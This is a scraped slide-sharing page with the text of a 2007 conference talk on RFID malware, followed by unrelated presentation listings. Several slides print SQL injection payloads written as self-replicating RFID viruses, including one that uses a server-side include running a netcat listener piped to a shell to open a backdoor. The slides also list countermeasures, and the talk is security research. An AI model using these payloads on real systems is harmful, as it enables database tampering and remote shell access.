the art of rfid exploitation
play

The Art of RFID Exploitation Melanie Rieback FIRST 20 June, 2007 - PowerPoint PPT Presentation

Oct 31, 2023 •330 likes •628 views

The Art of RFID Exploitation Melanie Rieback FIRST 20 June, 2007 What is RFID? RFID = Radio Frequency Identification Modern RFID Applications VeriChips Subdermal RFID VeriChips Subdermal RFID VeriChips Subdermal RFID VeriChips

  1. The Art of RFID Exploitation Melanie Rieback FIRST 20 June, 2007

  2. What is RFID? RFID = Radio Frequency Identification

  3. Modern RFID Applications

  4. VeriChips – Subdermal RFID

  5. VeriChips – Subdermal RFID

  6. VeriChips – Subdermal RFID

  7. VeriChips – Subdermal RFID

  8. VeriChips – Subdermal RFID

  9. VeriChips – Subdermal RFID What about security?

  10. VeriChips – Subdermal RFID What about security? Applied Digital's implantable chips do not employ cryptography as of yet. The system is nevertheless safe because its chips can only be read by the company's proprietary scanners. - Scott Silverman, CEO of Applied Digital http://www.siliconvalley.com/mld/siliconvalley/9154114.htm

  11. RFID Security Problems Some Security Problems: • Unauthorized tag reading • Tag cloning • Eavesdropping • Denial of Service • Tracking

  12. Introduction to RFID Malware What is RFID Malware? • Low-level misuse of improperly formatted RFID tag data • Three main kinds of RFID Malware: 1. RFID Exploits 2. RFID Worms 3. RFID Viruses

  13. Typical RFID System Architecture Management Interface (WWW) Network Connection Data Filtering + Database Correlation SW Glue Code RFID Readers + Tags Sun Microsystems RFID Architecture http://www.sun.com/software/products/rfid/rfid_ds.gif

  14. Our RFID Malware Test Platform • We built our own test RFID middleware • Test setup is modular • Ethical / legal concerns

  15. Types of RFID Exploits Buffer overflows • Small buffers • RFID emulators

  16. Types of RFID Exploits Code Insertion • Special characters • Client-side scripting • Server-side scripting

  17. Types of RFID Exploits SQL Injection • Steal data • Modify DB • Denial of Service • System commands

  18. RFID Worms What is an RFID Worm? • RFID exploit that downloads/executes remote malware • RFID worms propagate either via network or RFID tags • Often has a payload (modify filesystem / backdoor)

  19. RFID Viruses Application scenario: • Supermarket distribution center (with RFID tagged containers) • Arriving containers: scanned – emptied – refilled – relabeled • Containers are then sent onwards to local supermarkets

  20. RFID Viruses Example Database Layout: TagID NewContents OldContents 123 Apples Oranges 234 Pears ContainerContents table

  21. RFID Viruses How the RFID virus works: • SQL Injection attack: OldContents=Raspberries;UPDATE ContainerContents SET NewContents = NewContents || ``;[SQL Injection]''; • Filling in the SQL injection part: [SQL Injection] = UPDATE ContainerContents SET NewContents = NewContents || ``;[SQL Injection]'';

  22. RFID Viruses Self-replication: • ‘Get Current Query’ function: SELECT SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT,'`')>0; • A complete virus (Oracle SQL*Plus): Contents=Raspberries; UPDATE ContainerContents SET NewContents= NewContents || ';' || CHR(10) || (SELECT SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT,'`')>0);

  23. RFID Viruses Example Virus: (Oracle/SSI) • Here, SQL injection targets an INSERT query: Apples',NewContents=(select SUBSTR(SQL_TEXT,43,127) FROM v$sql WHERE INSTR(SQL_TEXT,'<!--#exec cmd=``netcat -lp1234|sh''-->')>0)-- • Payload uses a server-side include to open a backdoor on port 1234 of the web management platform • Virus fits on a 1 kbit RFID tag (127 characters)

  24. RFID Viruses Self-replication with Quines: • Quine = A program that prints its own source code: • The classic example (in C): char*f="char*f=%c%s%c;main() {printf(f,34,f,34,10);}%c"; main(){printf(f,34,f,34,10);} • Introns = Quine data not used to output quine code

  25. RFID Viruses Example Quine Virus: (mySQL) • This SQL injection virus is a quine: ';SET@a='UPDATE ContainerContents SET NewContents= concat(\'\\\';SET@a=\',QUOTE(@a),\';\',@a);-- <!--#exec cmd="regedit"-- >';UPDATE ContainerContents SET NewContents=concat('\';SET@a=', QUOTE(@a),';',@a);-- <!--#exec cmd="regedit"--> • Virus fits on a 2kbit RFID tag (233 characters)

  26. RFID Viruses Targets that we’ve infected:

  27. How to Stop RFID Malware Countermeasures: • Sanitize input • Use parameter binding • Error / bounds checking • Code review • Disable unnecessary facilities • Limit permissions • Segregate users (and servers)

  28. The Aftermath

  29. Questions?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Atlanta, USA 1. TSA worldwide RFID Trial History 2. ASTREC research effort in RFID 3. Inflight

Atlanta, USA 1. TSA worldwide RFID Trial History 2. ASTREC research effort in RFID 3. Inflight

March 2, 2014 Monte Jade's RFID Seminar Atlanta, USA 1. TSA worldwide RFID Trial History 2. ASTREC research effort in RFID 3. Inflight RFID 4. Current Airport RFID Deployments 5. Atlanta International Airport Activity with IATA RFID

912 views • 35 slides
IntelliSense RFID RFID PLATFORM WITH SENSORS INTEGRATION CAPABILITIES One Global Sensing

IntelliSense RFID RFID PLATFORM WITH SENSORS INTEGRATION CAPABILITIES One Global Sensing

IntelliSense RFID RFID PLATFORM WITH SENSORS INTEGRATION CAPABILITIES One Global Sensing Tag Oslo, 28 November 2007 IntelliSense RFID Workshop IntelliSense RFID RESEARCH PROJECT FOR TECHNOLOGY DEVELOPMENT WITHIN THE FIELDS OF RFID

788 views • 13 slides
TrainTraxx.com HiveID RFID/NFC Solutions for Model Railroaders Presented by Carlton Brown &amp;

TrainTraxx.com HiveID RFID/NFC Solutions for Model Railroaders Presented by Carlton Brown &amp;

TrainTraxx.com HiveID RFID/NFC Solutions for Model Railroaders Presented by Carlton Brown &amp; Blaine McDonnell Using RFID for Model Railroad Operations What is RFID? How does RFID Work? RFID Frequencies and Type of Tags

853 views • 25 slides
DEVELOPMENT OF AN RFID SYSTEM FOR SPS-ALPHA 1 OBJECTIVES RFID Implementation: SPS-ALPHA

DEVELOPMENT OF AN RFID SYSTEM FOR SPS-ALPHA 1 OBJECTIVES RFID Implementation: SPS-ALPHA

DEVELOPMENT OF AN RFID SYSTEM FOR SPS-ALPHA 1 OBJECTIVES RFID Implementation: SPS-ALPHA Structure RFID Technology Applications in SPS-ALPHA architecture Part Identification Location Referencing 2 Why Space Solar No

241 views • 22 slides
! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented Exploitation ! Techniques ! Demo ! Mac OS X x86_64 ! Conclusion ! Morris Worm (November 1988) ! Exploited a stack buffer overflow in BSD in.fingerd on VAX

1.02k views • 80 slides
RFID from Farm to Fork Piero Filippin p.filippin@wlv.ac.uk RFID from Farm to Fork Funded by

RFID from Farm to Fork Piero Filippin p.filippin@wlv.ac.uk RFID from Farm to Fork Funded by

RFID - From Farm to Fork Strengthening SME competitive advantage through RFID implementation RFID from Farm to Fork Piero Filippin p.filippin@wlv.ac.uk RFID from Farm to Fork Funded by the EU as part of the Competitiveness and Innovation

356 views • 9 slides
RFID Hacking Live Free or RFID Hard 01 Aug 2013 Black Hat USA 2013 Las Vegas, NV Presen

RFID Hacking Live Free or RFID Hard 01 Aug 2013 Black Hat USA 2013 Las Vegas, NV Presen

RFID Hacking Live Free or RFID Hard 01 Aug 2013 Black Hat USA 2013 Las Vegas, NV Presen sented ed b by: Francis Brown Bishop Fox www.bishopfox.com Agenda O V E R V I E W Qu Quic ick k Over erview ew RFID badge

883 views • 50 slides
RFID Technologies: Emerging Issues, Challenges, Policy Options A study by TNO and Telecom Italia

RFID Technologies: Emerging Issues, Challenges, Policy Options A study by TNO and Telecom Italia

RFID Technologies: Emerging Issues, Challenges, Policy Options A study by TNO and Telecom Italia for IPTS IFIP/FIDIS Summerschool Karlstad - 2007 Overview RFID Technologies RFID Markets RFID Privacy issues Conclusions 2

734 views • 19 slides
Mobile Data Entry for RFID RFID MRR NCDOT Materials and Tests Unit Welcome Transportation 2

Mobile Data Entry for RFID RFID MRR NCDOT Materials and Tests Unit Welcome Transportation 2

Mobile Data Entry for RFID RFID MRR NCDOT Materials and Tests Unit Welcome Transportation 2 WELCOME Transportation 3 Introduction The final link in the RFID program is the receiving of the project onto the project site. The producer

508 views • 30 slides
RFID Security and Privacy Gildas Avoine Information Security Group UCL Belgium February 2011,

RFID Security and Privacy Gildas Avoine Information Security Group UCL Belgium February 2011,

RFID Security and Privacy Gildas Avoine Information Security Group UCL Belgium February 2011, Corua, Spain RFID Primer RFID Primer Definition Radio frequency identification'' (RFID) means the use of electromagnetic radiating waves

729 views • 47 slides
Smart Sensing RFID Technology Passi sive, Activ ive e RFID, , Barcode code &amp; BLE based

Smart Sensing RFID Technology Passi sive, Activ ive e RFID, , Barcode code &amp; BLE based

Smart Sensing RFID Technology Passi sive, Activ ive e RFID, , Barcode code &amp; BLE based ed Hybri rid d Asset set Trac acking ing syst stem em Smart Sensing RFID Technology and Management Consultancy Every day, our work helps

579 views • 27 slides
Interaction of RFID Technology and Public Policy Presentation at RFID Privacy Workshop @ MIT

Interaction of RFID Technology and Public Policy Presentation at RFID Privacy Workshop @ MIT

Interaction of RFID Technology and Public Policy Presentation at RFID Privacy Workshop @ MIT 15 TH November 2003 By Rakesh Kumar Wipro Technologies India Privacy Consumers Perspective Privacy can be defined as customers ability to

284 views • 17 slides
Item Level RFID Tracking IT Architecture 1 In Intr troducti tion An RFID solution has

Item Level RFID Tracking IT Architecture 1 In Intr troducti tion An RFID solution has

Item Level RFID Tracking IT Architecture 1 In Intr troducti tion An RFID solution has several components, namely: Hardware -comprising readers, handhelds, tags etc Network infrastructure which connects these devices to the system

497 views • 14 slides
A Case Against Currently Used Hash Functions in RFID Protocols Workshop on RFID Security 2006

A Case Against Currently Used Hash Functions in RFID Protocols Workshop on RFID Security 2006

VLSI Institute for Applied Information Processing and Communications (IAIK) VLSI &amp; Security A Case Against Currently Used Hash Functions in RFID Protocols Workshop on RFID Security 2006 RFIDSec06 July 13-14, 2006, Graz, Austria

232 views • 21 slides
CAI Center of Automatic Identification Lukas Vojtech Daniel Lopour RFID in Europe RFID

CAI Center of Automatic Identification Lukas Vojtech Daniel Lopour RFID in Europe RFID

CAI Center of Automatic Identification Lukas Vojtech Daniel Lopour RFID in Europe RFID Future, Prague, 29. - 31. 11. 2011 CAI General information Location: Science technology park Msttice -20 min from Prague center -connection by

422 views • 17 slides
18-759: Wireless Networks L ecture 29: RFID Peter Steenkiste CS and ECE, Carnegie Mellon

18-759: Wireless Networks L ecture 29: RFID Peter Steenkiste CS and ECE, Carnegie Mellon

18-759: Wireless Networks L ecture 29: RFID Peter Steenkiste CS and ECE, Carnegie Mellon University Peking University, Summer 2016 1 Peter A. Steenkiste, CMU What is RFID ? Radio Frequency IDentification (RFID) is a method of remotely

572 views • 11 slides
Uncomputability, One-Slide Summary Viruses, OOP In a proof by contradiction , to show that A

Uncomputability, One-Slide Summary Viruses, OOP In a proof by contradiction , to show that A

Uncomputability, One-Slide Summary Viruses, OOP In a proof by contradiction , to show that A cannot exist you show that A implies the existence of X , some known-to-be-impossible thing. To show that A is undecidable or uncomputable , pick X

235 views • 8 slides
ECE560 Computer and Information Security Fall 2020 Malware Tyler Bletsch Duke University

ECE560 Computer and Information Security Fall 2020 Malware Tyler Bletsch Duke University

ECE560 Computer and Information Security Fall 2020 Malware Tyler Bletsch Duke University [SOUP13] defines malware as: a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality,

909 views • 53 slides
Syracuse University () July 20, 2010 0 / 0 1 The Basic math of fullerenes Definition: A

Syracuse University () July 20, 2010 0 / 0 1 The Basic math of fullerenes Definition: A

Fullerene Features Great and Small Jack E. Graver Syracuse University () July 20, 2010 0 / 0 1 The Basic math of fullerenes Definition: A fullerene is a trivalent plane graph = ( V , E , F ) with only hexagonal and pentagonal faces. V

556 views • 44 slides
COVID-19 In Infection Control Brookli line Panel 4 Meghan Baker, MD, ScD Hospital

COVID-19 In Infection Control Brookli line Panel 4 Meghan Baker, MD, ScD Hospital

COVID-19 In Infection Control Brookli line Panel 4 Meghan Baker, MD, ScD Hospital Epidemiologist Dana-Farber Cancer Institute Associate Hospital Epidemiologist Brigham and Womens Hospital Agenda Overview Transmission Infection Control

262 views • 23 slides
Artery Dissection Diagnosis and Treatment in an Era of Uncertainty James C. Iannuzzi MD, MPH,

Artery Dissection Diagnosis and Treatment in an Era of Uncertainty James C. Iannuzzi MD, MPH,

4/4/2019 Spontaneous Visceral Artery Dissection Diagnosis and Treatment in an Era of Uncertainty James C. Iannuzzi MD, MPH, RPVI Assistant Professor of Surgery Division of Endovascular and Vascular Surgery Department of Surgery University of

502 views • 29 slides
Lecture 19 A fg ect Mark Woehrer CS 3053 - Human-Computer Interaction Computer Science

Lecture 19 A fg ect Mark Woehrer CS 3053 - Human-Computer Interaction Computer Science

Lecture 19 A fg ect Mark Woehrer CS 3053 - Human-Computer Interaction Computer Science Department Oklahoma University Spring 2007 [Taken from Stanford CS147 with permission] CS 3053 - Mark Woehrer Learning Goals How does a fg ect play

535 views • 20 slides
CS449/649: Human-Computer Interaction Winter 2018 Lecture XII Anastasia Kuzminykh Prototype

CS449/649: Human-Computer Interaction Winter 2018 Lecture XII Anastasia Kuzminykh Prototype

CS449/649: Human-Computer Interaction Winter 2018 Lecture XII Anastasia Kuzminykh Prototype Design Prototypes - interactive design model of the product Low-fidelity High-fidelity Tangible &amp; Testable Artifacts Low-tech High-tech Partial

547 views • 21 slides
Discontinuous Solutions for the Degasperis-Procesi Equation. Giuseppe Maria Coclite Department

Discontinuous Solutions for the Degasperis-Procesi Equation. Giuseppe Maria Coclite Department

Discontinuous Solutions for the Degasperis-Procesi Equation. Giuseppe Maria Coclite Department of Mathematics University of Bari Via Orabona 4, 70125 Bari, Italy e-mail : coclitegm@dm.uniba.it joint work with Professor K. H. Karlsen

353 views • 22 slides

More recommend